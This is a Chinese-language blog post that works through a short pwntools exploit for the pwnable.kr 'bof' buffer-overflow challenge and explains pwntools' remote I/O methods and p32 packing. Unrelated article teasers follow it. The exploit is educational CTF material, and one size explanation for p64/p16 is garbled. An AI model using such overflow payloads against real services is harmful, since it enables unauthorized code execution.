2. 程式人生 > >pwntools學習記錄(一)

pwntools學習記錄(一)

阿新 發佈:2018-12-18

參考文章:https://bbs.pediy.com/thread-247217.htm
我們先來就著上次寫的bof的exp來講解一下

from pwn import *
c = remote("pwnable.kr",9000)
c.sendline("AAAA"*13+p32(0xcafebabe))
c.interactive()

remote("一個域名或者ip地址", 埠)會連線到我們指定的地址及埠。 然後該函式會返回remote物件

remote物件主要用來進行對遠端主機的輸入輸出. 它有如下幾個方法:

send(payload)傳送payload
sendline(payload)

傳送payload,並進行換行(末尾\n)
sendafter(some_string, payload)接收到 some_string 後, 傳送你的 payload
recvn(N) 接受 N(數字) 字元
recvline()接收一行輸出
recvlines(N)接收 N(數字) 行輸出
recvuntil(some_string)接收到 some_string 為止

在第三行中,p32()可以讓我們轉換整數到小端序格式.p32轉換4位元組. p64p16 則分別轉換 8 bit2 bit 數字

c.sendline將我們的payload傳送到遠端主機
c.interactive()

允許我們在終端裡將命令傳送到遠端伺服器. Pwntools 會自動接收輸出並回顯 .

相關推薦

pwntools學習記錄

參考文章:https://bbs.pediy.com/thread-247217.htm 我們先來就著上次寫的bof的exp來講解一下 from pwn import * c = remote("pwnable.kr",9000) c.sendline("AAAA"*13+p32(0xc

linux學習記錄

設備 ima 權限 logs spf style www. 塊設備 alt 1、各種顏色文件的含義 黃色表示設備文件 灰色表示其它文件 白色表示普通文件 綠色表示可執行文件; 紅色表示壓縮文件; 淺藍色表示鏈接文件; 灰色表示其它文件; 紅色閃爍表示鏈接的文件有問題了;

vue學習記錄—— vue開發調試神器vue-devtools安裝

shell gist 項目 擴展工具 code blog manifest false .net 網上有些貼子少了至關重要的一步導致我一直沒裝上, 切記!!install後還需build,且install和build都在vue-devtools文件夾內執行 github下載

微信小程序學習記錄

地址 n) taf forest 對象復制 strong display exp 價格 如何定義一個全局變量: 1,在根目錄下app.js中添加 App({ globalData: { g_isPlayingMusic : false, g_curre

SpringBoot學習記錄

not website snap 對象 mpi method oid pom pid 1. Spring的Java配置方式 Java配置是Spring4.x推薦的配置方式,可以完全替代xml配置。 1.1. @Configuration 和 @Bean Spring的Jav

python+selenium+unittest+pageobject學習記錄

exceptio 單元測試框架 回憶 stc ui自動化 import list 測試的 add 學習selenium已經一個月了,簡單概括一下學習的步驟,方便以後回憶。 一. 自動化測試的一些概念   1.分層的自動化測試:unit-->service-->U

【OpenAI-Gym】學習記錄gym安裝

前言 最近在學習強化學習( Reinforcement Learning ),自學過程包括理論學習部分與演算法學習部分。理論學習部分安利一本書籍 Richard S. Sutton 的 Reinforcement Learning : An Introduction;演算法學習主要為使用

Centos6.10下Open-falcon學習記錄——自定義資料採集、歷史查詢、程序監控

記錄了學習過程,官方文件地址http://book.open-falcon.org/zh_0_2/usage/getting-started.html 另外還看了Open-falcon作者的寫的設計理念的文,見open-falcon編寫的整個腦洞歷程 1 自定義資料採集 自定義的資料要求

redis入門學習記錄

1、linux線上下載Redis ,官網地址:https://redis.io/download目前,最新的Redist版本為redis-5.0.0,使用wget下載 進入/usr/local/src目錄,使用如下命令: wget http://download.redis.io/releases/red

redis入門學習記錄 redis入門學習記錄

繼第一節 redis入門學習記錄(一)之後,我們來學習redis的基本使用。 接下來我們看看/usr/local/redis/bin目錄下的幾個檔案作用是什麼?   redis-benchmark:redis效能測試工具   redis-check-aof:檢查aof日誌的工具   redi

不平等博弈問題學習記錄

聽到博弈問題,第一個想到的想必是用SG函式做的博弈題,就比如Nim遊戲 Nim遊戲:有N堆石子,每次選一堆石子,拿走若干石子(不能不取),先不能取的人輸 定義個SG函式 對於SG函式,大致就記錄兩個東西吧 定義SG函式g(x)=mex{ g(y) |

Spark學習記錄Spark 環境搭建以及worldCount示例

安裝Spark ------------------- 首先,安裝spark之前需要先安裝scala,並且安裝scala的版本一定要是將要安裝的spark要求的版本。比如spark2.1.0 要求scala 2.11系列的版本,不能多也不能少 1.下載spark-2.1.0-bin-hadoop

Java學習記錄java開發環境配置 及第一個執行程式

一. 下載jdk檔案 選擇對應版本下載即可安裝(本文以windows 64位為例) 安裝目錄儘量放至同一空白目錄下 安裝成功! 二. jdk環境配置 1. 點選此電腦右鍵點選屬性 2. 點選高階系統設定

OpenCV學習記錄:使用haar分類器進行人臉識別

https://blog.csdn.net/hongbin_xu/article/details/74202193 OpenCV支援的目標檢測的方法是利用樣本的Haar特徵進行的分類器訓練,得到的級聯boosted分類器(Cascade Classification)。

ES6 思考學習記錄

1.ES模組化如何使用,開發環境如何打包? 使用-> 語法是怎麼樣的。 開發環境-> webpack,rollup... 語法:在export裡面分為export defalut 和export ,export default 就是預

node 學習記錄

第一部分 NODE.JS基礎知識 node.js是一個JavaScript執行平臺,它的顯著特徵是它的非同步和事件驅動機制,以及小巧精悍的標準庫。目前有兩個版本LST以及當前版。 node.js和JavaScript的優勢之一就是單執行緒程式設計模型。多執行緒一般會引入bug。 非阻塞IO:

VRTK學習記錄

一,VRTK環境搭建 前提:匯入SteamVR 1.新建一個空物體改名字為[VRTK_SDK_Manager],並新增VRTK_SDK_Manager指令碼 2…新建一個空物體改名字為[VRTK_SDK_Setup],並新增VRTK_SDK_Setup指令碼 記

Linux入門學習記錄

Linux 環境安裝 1. vmware 虛擬機器工具(虛擬機器工具安裝好後,在正常使用的時候,一定是右鍵桌面圖示並以管理員身份執行) 1.1 網路模式       VMware虛擬機器有三種網路模式,分別是Bridged(橋接模式)、NAT(網路

js學習記錄js改變z-index樣式

實現的功能:頁面裡同一區域有兩個內容,它們是重疊的。用兩個按鈕控制誰來顯示。通過input的onclick呼叫js實現。 佈局:父標籤的position設定成relactive。子標籤都設定成absolute,top和left都設定成一樣。可以實現重疊的效果。並

SpringBoot學習記錄——入門篇

簡介 Spring Boot是由Pivotal團隊提供的全新框架,其設計目的是用來簡化新Spring應用的初始搭建以及開發過程。該框架使用了特定的方式來進行配置,從而使開發人員不再需要定義樣板化的配置。通過這種方式,Spring Boot致力於在蓬勃發展的快速應用開發領域(rapid app